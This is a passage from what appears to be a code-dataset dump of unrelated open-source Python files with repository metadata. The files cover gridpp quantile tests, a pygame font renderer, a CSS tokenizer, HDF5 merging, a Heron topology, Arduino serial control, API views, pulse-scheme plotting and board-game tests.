gridpp.get_neighbourhood_thresholds(values, num_thresholds) output = gridpp.neighbourhood_quantile_fast([[]], 0.9, 1, thresholds) self.assertEqual(len(output.shape), 2) self.assertEqual(output.shape[0], 0) self.assertEqual(output.shape[1], 0) def test_single_threshold(self): """Checks what happens when a single threshold is provided""" thresholds = [0] field = np.reshape(np.arange(9), [3, 3]) for halfwidth in [0, 1, 2]: output = gridpp.neighbourhood_quantile_fast(field, 0.9, halfwidth, thresholds) np.testing.assert_array_equal(output, np.zeros([3, 3])) def test_two_thresholds(self): """Checks what happens when a single threshold is provided""" thresholds = [0, 1] field = np.reshape(np.arange(9), [3, 3]) for halfwidth in [0, 1, 2]: output = gridpp.neighbourhood_quantile_fast(field, 0.9, 0, thresholds) self.assertTrue(((output >= 0) & (output <= 1)).all()) def test_missing(self): empty = np.zeros([5, 5]) empty[0:3, 0:3] = np.nan thresholds = [0, 1] output = gridpp.neighbourhood_quantile_fast(empty, 0.5, 1, thresholds) self.assertTrue(np.isnan(np.array(output)[0:2,0:2]).all()) def test_quantile(self): thresholds = gridpp.get_neighbourhood_thresholds(values, 100) output = np.array(gridpp.neighbourhood_quantile_fast(values, 0.5, 1, thresholds)) self.assertEqual(output[2][2], 12) # Should be 12.5 self.assertEqual(output[2][3], 12.5) # Should be 13 output = np.array(gridpp.neighbourhood_quantile_fast(np.full([100,100], np.nan), 0.5, 1, thresholds)) self.assertTrue(np.isnan(np.array(output)).all()) output = np.array(gridpp.neighbourhood_quantile_fast(np.zeros([100,100]), 0.5, 1, thresholds)) self.assertTrue((np.array(output) == 0).all()) output = np.array(gridpp.neighbourhood_quantile(values, 0.5, 1)) self.assertEqual(output[2][2], 12.5) self.assertEqual(output[2][3], 13) self.assertEqual(output[0][4], 4) def test_3d(self): np.random.seed(1000) values = np.random.rand(200, 200) values3 = np.zeros([200, 200, 5]) for i in range(5): values3[:, :, i] = values halfwidths = [0, 1, 5] quantile = 0.5 thresholds = [0, 0.25, 0.5, 0.75, 1] for halfwidth in halfwidths: output_2d = gridpp.neighbourhood_quantile_fast(values, quantile, halfwidth, thresholds) output_3d = gridpp.neighbourhood_quantile_fast(values3, quantile, halfwidth, thresholds) np.testing.assert_array_almost_equal(output_2d, output_3d) def test_varying_quantile(self): """ For now check that this runs """ values = np.array([[0, 1], [2, 3], [4, 5]]) halfwidth = 1 quantiles = np.ones(values.shape) * 0.5 thresholds = [0, 0.25, 0.5, 0.75, 1] gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds) values = np.nan *np.zeros(values.shape) np.testing.assert_array_equal(values, gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)) def test_varying_quantile_3d(self): """ For now check that this runs """ np.random.seed(1000) values = np.random.rand(100, 50, 2) halfwidth = 1 quantiles = np.ones(values[:, :, 0].shape) * 0.5 thresholds = [0, 0.25, 0.5, 0.75, 1] gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds) values = np.nan *np.zeros(values.shape) np.testing.assert_array_equal(values[:, :, 0], gridpp.neighbourhood_quantile_fast(values, quantiles, halfwidth, thresholds)) def test_all_same(self): """ Check that min and max of an neighbourhood with all identical values is correct """ field = np.zeros([10, 10]) thresholds = [0, 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 100] for quantile in [0, 0.001, 0.999, 1]: with self.subTest(quantile=quantile): output = gridpp.neighbourhood_quantile_fast(field, quantile, 5, thresholds) np.testing.assert_array_almost_equal(output, field) if __name__ == '__main__': unittest.main()
gpl-2.0
6,977,101,496,407,008,000
39.335714
132
0.606517
false
3.290793
true
false
false
Fenixin/yogom
tryengine/fontrenderer.py
1
8186
#!/usr/bin/env python # -*- coding: utf-8 -*- # # This file is part of TryEngine. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ''' Created on 20/03/2014 @author: Alejandro Aguilera Martínez @email: fenixin@gmail.com Module to render fonts with different effects. See FontRenderer for help. ''' from itertools import product from math import ceil import pygame as pg from pygame.font import Font from pygame import Surface from pygame.transform import laplacian #TODO: Transparent things aren't handled properly! # Choosing the same color as the transparent color # used internally will do very ugly stuff class FontRenderer(object): ''' Object to render text of any size. Rendering text is made through layers. Layer are passed to render with a list. You can render as many layer as you want. Here it is an example with all the layer types: layers = [ ('external_border',{'width':2, 'color':VIOLET}), ('shadows',{'positions_and_colors':[((2,-2),GREEN),((1,-1),RED)]}), ('normal',{'color':WHITE}),# ('internal_border', {'color':(GREEN)}), ('textured',{'image':image_texture}) ] ''' TRANSPARENT = (255, 0, 255) def __init__(self, font_file, antialias=False): ''' Constructor ''' if font_file: self.font_file = font_file else: self.font_file = pg.font.get_default_font() self._font_sizes = {} self.antialias = antialias # Parameters to create images self.DISPLAY_BITDEPTH = pg.display.get_surface().get_bitsize() self.IMG_FLAGS = pg.HWSURFACE def _add_fontsize(self, filename, size): """ Add a font size renderer to _font_sizes. """ self._font_sizes[size] = Font(filename, size) def __getitem__(self, size): """ Return the proper font size. """ try: return self._font_sizes[size] except KeyError: self._add_fontsize(self.font_file, size) return self._font_sizes[size] def _get_new_surface(self, text, pixel_size): """ Return a surface with the needed size for the text.""" img = Surface(pixel_size, self.IMG_FLAGS) img.fill(self.TRANSPARENT) img.set_colorkey(self.TRANSPARENT) return img def size(self, text, size, layers = []): """ Return the image size in pixels. This take into account all the layer given and calculate the correct image size. """ x, y = self[size].size(text) for layer in layers: if layer[0] == 'shadows': mx = my = 0 for t in layer[1]['positions_and_colors']: mx = max(abs(t[0][0]), mx) my = max(abs(t[0][1]), my) x += mx*2 y += my*2 elif layer[0] == 'external_border': width = layer[1]['width'] x += width*2 y += width*2 return (x,y) def _render_internal(self, text, size, color, bg_color): """ Wrapper """ # For fastest blitting set hwsurface and the same # bit depth as the display surface. # Also for your # own sanity, remember that rendering fonts will give # you a 8bit image and, sometimes, this will give # unexpected results # when blittings in a 32bits surface img = self[size].render(text, self.antialias, color, bg_color) return img.convert(self.DISPLAY_BITDEPTH, self.IMG_FLAGS) def render(self, text, size, bg_color, bg_transparent, layers): """ Render text through the defined layers. """ pixel_size = self.size(text, size, layers) wo_effects_ps = self[size].size(text) offset = ((pixel_size[0] - wo_effects_ps[0]) / 2, (pixel_size[1] - wo_effects_ps[1]) / 2) result = self._get_new_surface(text, pixel_size) result.fill(bg_color) if bg_transparent: result.set_colorkey(bg_color) # Create all the images and blit them together images = [getattr(self, '_' + fun)(text, size, pixel_size, offset, **args) for fun, args in layers] [result.blit(image, (0,0)) for image in images] return result def _fill_image(self, dest, filler, blendmode = 0): """ Fills dest surface with filler repeating if necesary. """ ds = dest.get_size() fs = filler.get_size() for x in xrange(int(ceil(ds[0]/float(fs[0])))): for y in xrange(int(ceil(ds[1]/float(fs[1])))): dest.blit(filler, (x*fs[0],y*fs[1]), None, blendmode) print x,y """ Layers """ def _textured(self, text, size, pixel_size, offset, image = None): """ Render a textured font. Transparent colors in the texture will be ignored. """ BG = (0,0,0) FG = (255,255,255) blendmode = pg.BLEND_MULT temp = self._get_new_surface(text, pixel_size) temp.fill(BG) temp.blit(self._render_internal(text, size, FG, BG), offset) self._fill_image(temp, image, blendmode) return temp def _normal(self, text, size, pixel_size, offset, color = None): """ Return a normal render of the text. """ s = self._get_new_surface(text, pixel_size) img = self._render_internal(text, size, color, self.TRANSPARENT) img.set_colorkey(self.TRANSPARENT) s.blit(img, offset) return s def _shadows(self, text, size, pixel_size, offset, positions_and_colors): """ Add 'shadows' with different colors. """ wo_effects_ps = self[size].size(text) offset = ((pixel_size[0] - wo_effects_ps[0]) / 2, (pixel_size[1] - wo_effects_ps[1]) / 2) f = self._render_internal s = self._get_new_surface(text, pixel_size) transparent = self.TRANSPARENT for pos,color in positions_and_colors: shadow = f(text, size, color, transparent) shadow.set_colorkey(transparent) n_pos = (pos[0]+offset[0], pos[1]+offset[1]) s.blit(shadow, n_pos) return s def _external_border(self, text, size, pixel_size, offset, width = None, color = None): """ Add an external border (outside of the font). """ wo_effects_ps = self[size].size(text) offset = ((pixel_size[0] - wo_effects_ps[0]) / 2, (pixel_size[1] - wo_effects_ps[1]) / 2) l = [] for x, y in product(xrange(-width, width+1, 1),xrange(-width, width+1, 1)): l.append( ((x,y),color) ) return self._shadows(text, size, pixel_size, offset, l) def _internal_border(self, text, size, pixel_size, offset, color = None): """ Add an internal border (inside of the font). """ # Use very different colors to get a very sharp edge BG = (0,0,0) FG = (255,255,255) temp = self._get_new_surface(text, pixel_size) temp.fill(BG) temp.blit(self._render_internal(text, size, FG, BG), offset) temp = laplacian(temp) temp.set_colorkey(FG) result = self._get_new_surface(text, pixel_size) result.fill(color) result.blit(temp, (0,0)) result.set_colorkey(BG) return result
gpl-3.0
-3,237,735,693,081,282,000
32.137652
107
0.5719
false
3.688598
false
false
false
kgn/cssutils
src/cssutils/tokenize2.py
1
9735
#!/usr/bin/env python # -*- coding: utf-8 -*- """New CSS Tokenizer (a generator) """ __all__ = ['Tokenizer', 'CSSProductions'] __docformat__ = 'restructuredtext' __version__ = '$Id$' from cssproductions import * from helper import normalize import itertools import re _TOKENIZER_CACHE = {} class Tokenizer(object): """ generates a list of Token tuples: (Tokenname, value, startline, startcolumn) """ _atkeywords = { u'@font-face': CSSProductions.FONT_FACE_SYM, u'@import': CSSProductions.IMPORT_SYM, u'@media': CSSProductions.MEDIA_SYM, u'@namespace': CSSProductions.NAMESPACE_SYM, u'@page': CSSProductions.PAGE_SYM, u'@variables': CSSProductions.VARIABLES_SYM } _linesep = u'\n' unicodesub = re.compile(r'\\[0-9a-fA-F]{1,6}(?:\r\n|[\t|\r|\n|\f|\x20])?').sub cleanstring = re.compile(r'\\((\r\n)|[\n|\r|\f])').sub def __init__(self, macros=None, productions=None, doComments=True): """ inits tokenizer with given macros and productions which default to cssutils own macros and productions """ if type(macros)==type({}): macros_hash_key = sorted(macros.items()) else: macros_hash_key = macros hash_key = str((macros_hash_key, productions)) if hash_key in _TOKENIZER_CACHE: (tokenmatches, commentmatcher, urimatcher) = _TOKENIZER_CACHE[hash_key] else: if not macros: macros = MACROS if not productions: productions = PRODUCTIONS tokenmatches = self._compile_productions(self._expand_macros(macros, productions)) commentmatcher = [x[1] for x in tokenmatches if x[0] == 'COMMENT'][0] urimatcher = [x[1] for x in tokenmatches if x[0] == 'URI'][0] _TOKENIZER_CACHE[hash_key] = (tokenmatches, commentmatcher, urimatcher) self.tokenmatches = tokenmatches self.commentmatcher = commentmatcher self.urimatcher = urimatcher self._doComments = doComments self._pushed = [] def _expand_macros(self, macros, productions): """returns macro expanded productions, order of productions is kept""" def macro_value(m): return '(?:%s)' % macros[m.groupdict()['macro']] expanded = [] for key, value in productions: while re.search(r'{[a-zA-Z][a-zA-Z0-9-]*}', value): value = re.sub(r'{(?P<macro>[a-zA-Z][a-zA-Z0-9-]*)}', macro_value, value) expanded.append((key, value)) return expanded def _compile_productions(self, expanded_productions): """compile productions into callable match objects, order is kept""" compiled = [] for key, value in expanded_productions: compiled.append((key, re.compile('^(?:%s)' % value, re.U).match)) return compiled def push(self, *tokens): """Push back tokens which have been pulled but not processed.""" self._pushed = itertools.chain(tokens, self._pushed) def clear(self): self._pushed = [] def tokenize(self, text, fullsheet=False): """Generator: Tokenize text and yield tokens, each token is a tuple of:: (name, value, line, col) The token value will contain a normal string, meaning CSS unicode escapes have been resolved to normal characters. The serializer escapes needed characters back to unicode escapes depending on the stylesheet target encoding. text to be tokenized fullsheet if ``True`` appends EOF token as last one and completes incomplete COMMENT or INVALID (to STRING) tokens """ def _repl(m): "used by unicodesub" num = int(m.group(0)[1:], 16) if num < 0x10000: return unichr(num) else: return m.group(0) def _normalize(value): "normalize and do unicodesub" return normalize(self.unicodesub(_repl, value)) line = col = 1 # check for BOM first as it should only be max one at the start (BOM, matcher), productions = self.tokenmatches[0], self.tokenmatches[1:] match = matcher(text) if match: found = match.group(0) yield (BOM, found, line, col) text = text[len(found):] # check for @charset which is valid only at start of CSS if text.startswith('@charset '): found = '@charset ' # production has trailing S! yield (CSSProductions.CHARSET_SYM, found, line, col) text = text[len(found):] col += len(found) while text: # do pushed tokens before new ones for pushed in self._pushed: yield pushed # speed test for most used CHARs, sadly . not possible :( c = text[0] if c in u',:;{}>+[]': yield ('CHAR', c, line, col) col += 1 text = text[1:] else: # check all other productions, at least CHAR must match for name, matcher in productions: # TODO: USE bad comment? if fullsheet and name == 'CHAR' and text.startswith(u'/*'): # before CHAR production test for incomplete comment possiblecomment = u'%s*/' % text match = self.commentmatcher(possiblecomment) if match and self._doComments: yield ('COMMENT', possiblecomment, line, col) text = None # ate all remaining text break match = matcher(text) # if no match try next production if match: found = match.group(0) # needed later for line/col if fullsheet: # check if found may be completed into a full token if 'INVALID' == name and text == found: # complete INVALID to STRING with start char " or ' name, found = 'STRING', '%s%s' % (found, found[0]) elif 'FUNCTION' == name and\ u'url(' == _normalize(found): # url( is a FUNCTION if incomplete sheet # FUNCTION production MUST BE after URI production for end in (u"')", u'")', u')'): possibleuri = '%s%s' % (text, end) match = self.urimatcher(possibleuri) if match: name, found = 'URI', match.group(0) break if name in ('DIMENSION', 'IDENT', 'STRING', 'URI', 'HASH', 'COMMENT', 'FUNCTION', 'INVALID', 'UNICODE-RANGE'): # may contain unicode escape, replace with normal # char but do not _normalize (?) value = self.unicodesub(_repl, found) if name in ('STRING', 'INVALID'): #'URI'? # remove \ followed by nl (so escaped) from string value = self.cleanstring('', found) else: if 'ATKEYWORD' == name: try: # get actual ATKEYWORD SYM name = self._atkeywords[_normalize(found)] except KeyError, e: # might also be misplace @charset... if '@charset' == found and u' ' == text[len(found):len(found)+1]: # @charset needs tailing S! name = CSSProductions.CHARSET_SYM found += u' ' else: name = 'ATKEYWORD' value = found # should not contain unicode escape (?) if self._doComments or (not self._doComments and name != 'COMMENT'): yield (name, value, line, col) text = text[len(found):] nls = found.count(self._linesep) line += nls if nls: col = len(found[found.rfind(self._linesep):]) else: col += len(found) break if fullsheet: yield ('EOF', u'', line, col)
gpl-3.0
-3,785,011,545,157,365,000
41.851351
101
0.451567
false
4.901813
false
false
false
startcode/apollo
modules/tools/prediction/mlp_train/merge_h5.py
1
2643
#!/usr/bin/env python ############################################################################### # Copyright 2018 The Apollo Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################### import os import glob import argparse import datetime import numpy as np import h5py def load_hdf5(filename): """ load training samples from *.hdf5 file """ if not(os.path.exists(filename)): print "file:", filename, "does not exist" os._exit(1) if os.path.splitext(filename)[1] != '.h5': print "file:", filename, "is not an hdf5 file" os._exit(1) h5_file = h5py.File(filename, 'r') values = h5_file.values()[0] print "load data size:", values.shape[0] return values if __name__ == '__main__': parser = argparse.ArgumentParser(description = 'generate training samples\ from a specified directory') parser.add_argument('directory', type=str, help='directory contains feature files in .h5') args = parser.parse_args() path = args.directory print "load h5 from directory:", format(path) if os.path.isdir(path): features = None labels = None h5_files = glob.glob(path + '/*.h5') print "Length of files:", len(h5_files) for i, h5_file in enumerate(h5_files): print "Process File", i, ":", h5_file feature = load_hdf5(h5_file) if np.any(np.isinf(feature)): print "inf data found" features = np.concatenate((features, feature), axis=0) if features is not None \ else feature else: print "Fail to find", path os._exit(-1) date = datetime.datetime.now().strftime('%Y-%m-%d') sample_dir = path + '/mlp_merge' if not os.path.exists(sample_dir): os.makedirs(sample_dir) sample_file = sample_dir + '/mlp_' + date + '.h5' print "Save samples file to:", sample_file h5_file = h5py.File(sample_file, 'w') h5_file.create_dataset('data', data=features) h5_file.close()
apache-2.0
-8,108,443,370,418,419,000
32.455696
92
0.595157
false
3.875367
false
false
false
twitter/heron
integration_test/src/python/integration_test/topology/one_spout_multi_tasks/one_spout_multi_tasks.py
2
1572
#!/usr/bin/env python3 # -*- encoding: utf-8 -*- # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=missing-docstring from heronpy.api.stream import Grouping from integration_test.src.python.integration_test.core import TestTopologyBuilder from integration_test.src.python.integration_test.common.bolt import IdentityBolt from integration_test.src.python.integration_test.common.spout import ABSpout def one_spout_multi_tasks_builder(topology_name, http_server_url): builder = TestTopologyBuilder(topology_name, http_server_url) ab_spout = builder.add_spout("ab-spout", ABSpout, 3) builder.add_bolt("identity-bolt", IdentityBolt, inputs={ab_spout: Grouping.SHUFFLE}, par=1, optional_outputs=['word']) return builder.create_topology()
apache-2.0
4,743,227,587,584,489,000
40.368421
81
0.741094
false
3.787952
true
false
false
webbhorn/Arduino-Switch-Controller
arduino/arduino.py
1
2214
#!/usr/bin/env python import serial, time class Arduino(object): __OUTPUT_PINS = -1 def __init__(self, port, baudrate=9600): self.serial = serial.Serial(port, baudrate) def __str__(self): return "Arduino is on port %s at %d baudrate" %(self.serial.port, self.serial.baudrate) def output(self, pinArray): self.__sendData(len(pinArray)) if(isinstance(pinArray, list) or isinstance(pinArray, tuple)): self.__OUTPUT_PINS = pinArray for each_pin in pinArray: self.__sendPin(each_pin) return True def setLow(self, pin): self.__sendData('0') self.__sendPin(pin) return True def setHigh(self, pin): self.__sendData('1') self.__sendPin(pin) return True def getState(self, pin): self.__sendData('2') self.__sendPin(pin) return self.__formatPinState(self.__getData()) def analogWrite(self, pin, value): self.__sendData('3') hex_value = hex(value)[2:] if(len(hex_value)==1): self.__sendData('0') else: self.__sendData(hex_value[0]) self.__sendData(hex_value[1]) return True def analogRead(self, pin): self.__sendData('4') self.__sendPin(pin) return self.__getData() def turnOff(self): for each_pin in self.__OUTPUT_PINS: self.setLow(each_pin) return True def __sendPin(self, pin): pin_in_char = chr(pin+48) self.__sendData(pin_in_char) def __sendData(self, serial_data): while(self.__getData()!="what"): pass self.serial.write(str(serial_data)) def __getData(self): return self.serial.readline().replace("\r\n","") def __formatPinState(self, pinValue): if pinValue=='1': return True else: return False def close(self): self.serial.close() return True """ def __del__(self): #close serial connection once program ends #this fixes the problem of port getting locked or unrecoverable in some linux systems self.serial.close() """
mit
4,657,381,806,307,410,000
24.744186
95
0.555104
false
3.771721
false
false
false
clouserw/zamboni
mkt/websites/views.py
1
1959
from django.db.transaction import non_atomic_requests from rest_framework.generics import ListAPIView from rest_framework.permissions import AllowAny from mkt.api.authentication import (RestOAuthAuthentication, RestSharedSecretAuthentication) from mkt.api.base import CORSMixin, MarketplaceView from mkt.api.paginator import ESPaginator from mkt.search.filters import (PublicSearchFormFilter, RegionFilter, SearchQueryFilter) from mkt.search.forms import SimpleSearchForm from mkt.websites.indexers import WebsiteIndexer from mkt.websites.models import Website from mkt.websites.serializers import ESWebsiteSerializer, WebsiteSerializer class WebsiteView(CORSMixin, MarketplaceView, ListAPIView): cors_allowed_methods = ['get'] authentication_classes = [RestSharedSecretAuthentication, RestOAuthAuthentication] permission_classes = [AllowAny] serializer_class = WebsiteSerializer model = Website class WebsiteSearchView(CORSMixin, MarketplaceView, ListAPIView): """ Base website search view based on a single-string query. """ cors_allowed_methods = ['get'] authentication_classes = [RestSharedSecretAuthentication, RestOAuthAuthentication] permission_classes = [AllowAny] filter_backends = [PublicSearchFormFilter, RegionFilter, SearchQueryFilter] serializer_class = ESWebsiteSerializer paginator_class = ESPaginator form_class = SimpleSearchForm def get_queryset(self): return WebsiteIndexer.search() @classmethod def as_view(cls, **kwargs): # Make all search views non_atomic: they should not need the db, or # at least they should not need to make db writes, so they don't need # to be wrapped in transactions. view = super(WebsiteSearchView, cls).as_view(**kwargs) return non_atomic_requests(view)
bsd-3-clause
-3,533,117,552,146,456,000
38.979592
79
0.720265
false
4.462415
false
false
false
rizumu/bootmachine
bootmachine/management/__init__.py
1
3322
# (c) 2008-2011 James Tauber and contributors; written for Pinax (http://pinaxproject.com) # Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php import os import sys import bootmachine BOOTMACHINE_COMMAND_DIR = os.path.join( os.path.dirname(bootmachine.__file__), "management", "commands" ) class CommandNotFound(Exception): pass class CommandLoader(object): def __init__(self): self.command_dir = BOOTMACHINE_COMMAND_DIR self.commands = {} self._load_commands() def _load_commands(self): for f in os.listdir(self.command_dir): if not f.startswith("_") and f.endswith(".py"): name = f[:-3] mod = "bootmachine.management.commands.%s" % name try: __import__(mod) except: self.commands[name] = sys.exc_info() else: mod = sys.modules[mod] self.commands[name] = mod.Command() def load(self, name): try: command = self.commands[name] except KeyError: raise CommandNotFound("Unable to find command '%s'" % name) else: if isinstance(command, tuple): # an exception occurred when importing the command so let's # re-raise it here raise(command[0], command[1], command[2]) return command class CommandRunner(object): usage = "bootmachine-admin command [options] [args]" def __init__(self, argv=None): self.argv = argv or sys.argv[:] self.loader = CommandLoader() self.loader.commands["help"] = self.help() def help(self): loader, usage = self.loader, self.usage # use BaseCommand for --version from bootmachine.management.base import BaseCommand class HelpCommand(BaseCommand): def handle(self, *args, **options): print("Usage: {}\n".format(usage)) print("Options:" " --version show program's version number and exit\n" " -h, --help show this help message and exit\n" "Available commands:\n") for command in loader.commands.keys(): print(" {}".format(command)) return HelpCommand() def execute(self): argv = self.argv[:] try: command = self.argv[1] except IndexError: # display help if no arguments were given. command = "help" argv.extend(["help"]) # special cases for bootmachine-admin itself if command in ["-h", "--help"]: argv.pop() command = "help" argv.extend(["help"]) if command == "--version": argv.pop() command = "help" argv.extend(["help", "--version"]) # load command and run it! try: self.loader.load(command).run_from_argv(argv) except CommandNotFound as e: sys.stderr.write("{}\n".format(e.args[0])) sys.exit(1) def execute_from_command_line(): """ A simple method that runs a ManagementUtility. """ runner = CommandRunner() runner.execute()
mit
-1,116,202,746,595,356,300
30.339623
90
0.54124
false
4.353866
false
false
false
DiCarloLab-Delft/PycQED_py3
pycqed/utilities/pulse_scheme.py
1
5469
import numpy as np import matplotlib.pyplot as plt import matplotlib.patches def new_pulse_fig(figsize): ''' Open a new figure and configure it to plot pulse schemes. ''' fig, ax = plt.subplots(1, 1, figsize=figsize, frameon=False) ax.axis('off') fig.subplots_adjust(bottom=0, top=1, left=0, right=1) ax.axhline(0, color='0.75') return fig, ax def new_pulse_subplot(fig, *args, **kwargs): ''' Add a new subplot configured for plotting pulse schemes to a figure. All *args and **kwargs are passed to fig.add_subplot. ''' ax = fig.add_subplot(*args, **kwargs) ax.axis('off') fig.subplots_adjust(bottom=0, top=1, left=0, right=1) ax.axhline(0, color='0.75') return ax def mwPulse(ax, pos, y_offs=0, width=1.5, amp=1, label=None, phase=0, labelHeight=1.3, color='C0', modulation='normal', **plot_kws): ''' Draw a microwave pulse: Gaussian envelope with modulation. ''' x = np.linspace(pos, pos + width, 100) envPos = amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2) envNeg = -amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2) if modulation == 'normal': mod = envPos * np.sin(2 * np.pi * 3 / width * x + phase) elif modulation == 'high': mod = envPos * np.sin(5 * np.pi * 3 / width * x + phase) else: raise ValueError() ax.plot(x, envPos+y_offs, '--', color=color, **plot_kws) ax.plot(x, envNeg+y_offs, '--', color=color, **plot_kws) ax.plot(x, mod+y_offs, '-', color=color, **plot_kws) if label is not None: ax.text(pos + width / 2, labelHeight, label, horizontalalignment='right', color=color) return pos + width def fluxPulse(ax, pos, y_offs=0, width=2.5, s=.1, amp=1.5, label=None, labelHeight=1.7, color='C1', **plot_kws): ''' Draw a smooth flux pulse, where the rising and falling edges are given by Fermi-Dirac functions. s: smoothness of edge ''' x = np.linspace(pos, pos + width, 100) y = amp / ((np.exp(-(x - (pos + 5.5 * s)) / s) + 1) * (np.exp((x - (pos + width - 5.5 * s)) / s) + 1)) ax.fill_between(x, y+y_offs, color=color, alpha=0.3) ax.plot(x, y+y_offs, color=color, **plot_kws) if label is not None: ax.text(pos + width / 2, labelHeight, label, horizontalalignment='center', color=color) return pos + width def ramZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'): ''' Draw a Ram-Z flux pulse, i.e. only part of the pulse is shaded, to indicate cutting off the pulse at some time. ''' xLeft = np.linspace(pos, pos + sep, 100) xRight = np.linspace(pos + sep, pos + width, 100) xFull = np.concatenate((xLeft, xRight)) y = amp / ((np.exp(-(xFull - (pos + 5.5 * s)) / s) + 1) * (np.exp((xFull - (pos + width - 5.5 * s)) / s) + 1)) yLeft = y[:len(xLeft)] ax.fill_between(xLeft, yLeft+y_offs, alpha=0.3, color=color, linewidth=0.0) ax.plot(xFull, y+y_offs, color=color) return pos + width def modZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'): ''' Draw a modulated Z pulse. ''' return pos + width def interval(ax, start, stop, y_offs = 0, height=1.5, label=None, labelHeight=None, vlines=True, color='k', arrowstyle='<|-|>', **plot_kws): ''' Draw an arrow to indicate an interval. ''' if labelHeight is None: labelHeight = height + 0.2 arrow = matplotlib.patches.FancyArrowPatch( posA=(start, height+y_offs), posB=(stop, height+y_offs), arrowstyle=arrowstyle, color=color, mutation_scale=7, **plot_kws) ax.add_patch(arrow) if vlines: ax.plot([start, start], [0+y_offs, height+y_offs], '--', color=color, **plot_kws) ax.plot([stop, stop], [0+y_offs, height+y_offs], '--', color=color, **plot_kws) if label is not None: ax.text((start + stop) / 2, labelHeight+y_offs, label, color=color, horizontalalignment='center') def interval_vertical(ax, start, stop, position, label=None, labelHeight=None, color='k', arrowstyle='<|-|>', labeloffset: float = 0, horizontalalignment='center'): ''' Draw an arrow to indicate an interval. ''' if labelHeight is None: labelHeight = (start+stop)/2 arrow = matplotlib.patches.FancyArrowPatch( posA=(position, start), posB=(position, stop), arrowstyle=arrowstyle, color=color, mutation_scale=7) ax.add_patch(arrow) if label is not None: ax.text(position+labeloffset, labelHeight, label, color=color, horizontalalignment=horizontalalignment) def meter(ax, x0, y0, y_offs=0, w=1.1, h=.8, color='black', fillcolor=None): """ Draws a measurement meter on the specified position. """ if fillcolor == None: fill = False else: fill = True p1 = matplotlib.patches.Rectangle( (x0-w/2, y0-h/2+y_offs), w, h, facecolor=fillcolor, edgecolor=color, fill=fill, zorder=5) ax.add_patch(p1) p0 = matplotlib.patches.Wedge( (x0, y0-h/4+y_offs), .4, theta1=40, theta2=180-40, color=color, lw=2, width=.01, zorder=5) ax.add_patch(p0) ax.arrow(x0, y0-h/4+y_offs, dx=.5*np.cos(np.deg2rad(70)), dy=.5*np.sin(np.deg2rad(60)), width=.03, color=color, zorder=5)
mit
-4,925,029,477,719,938,000
32.552147
89
0.585848
false
2.957815
false
false
false
TheWiseLion/pykhet
tests/game_tests.py
1
5304
import unittest from pykhet.components.types import MoveType, Move, TeamColor, Orientation from pykhet.components.types import Position from pykhet.games.game_types import ClassicGame class TestClassicGames(unittest.TestCase): def setUp(self): self.game = ClassicGame() def tearDown(self): self.game = None def test_available_moves_classic(self): sphinx_moves_silver = self.game.get(0, 0).get_moves(self.game) sphinx_moves_red = self.game.get(9, 7).get_moves(self.game) # Sphinx Only Has 1 Move self.assertEquals(len(sphinx_moves_silver), 1) self.assertEquals(len(sphinx_moves_silver), len(sphinx_moves_red)) pharaoh_moves_silver = self.game.get(5, 0).get_moves(self.game) pharaoh_moves_red = self.game.get(4, 7).get_moves(self.game) # three moves, zero rotations self.assertEquals(len(pharaoh_moves_red), 3) self.assertEquals(len(pharaoh_moves_red), len(pharaoh_moves_silver)) # Test Anubises anubis_moves_silver = self.game.get(4, 0).get_moves(self.game) anubis_moves_red = self.game.get(5, 7).get_moves(self.game) # four move, two rotations self.assertEquals(len(anubis_moves_red), 6) self.assertEquals(len(anubis_moves_red), len(anubis_moves_silver)) anubis_moves_silver = self.game.get(6, 0).get_moves(self.game) anubis_moves_red = self.game.get(3, 7).get_moves(self.game) # three moves, two rotations self.assertEquals(len(anubis_moves_red), 5) self.assertEquals(len(anubis_moves_red), len(anubis_moves_silver)) # Test Scarabs scarab1_moves_silver = self.game.get(4, 3).get_moves(self.game) scarab1_moves_red = self.game.get(5, 4).get_moves(self.game) # 4 moves, 1 swap, 2 rotations self.assertEquals(len(scarab1_moves_silver), 7) self.assertEquals(len(scarab1_moves_red), len(scarab1_moves_silver)) scarab2_moves_silver = self.game.get(5, 3).get_moves(self.game) scarab2_moves_red = self.game.get(4, 4).get_moves(self.game) # 5 moves, 2 rotations self.assertEquals(len(scarab2_moves_silver), 7) self.assertEquals(len(scarab2_moves_red), len(scarab2_moves_silver)) # Test Pyramids: p1_silver = self.game.get(2, 1).get_moves(self.game) p1_red = self.game.get(7, 6).get_moves(self.game) # 6 moves, 2 rotations self.assertEquals(len(p1_silver), 8) self.assertEquals(len(p1_red), len(p1_silver)) p2_silver = self.game.get(6, 5).get_moves(self.game) p2_red = self.game.get(3, 2).get_moves(self.game) # 5 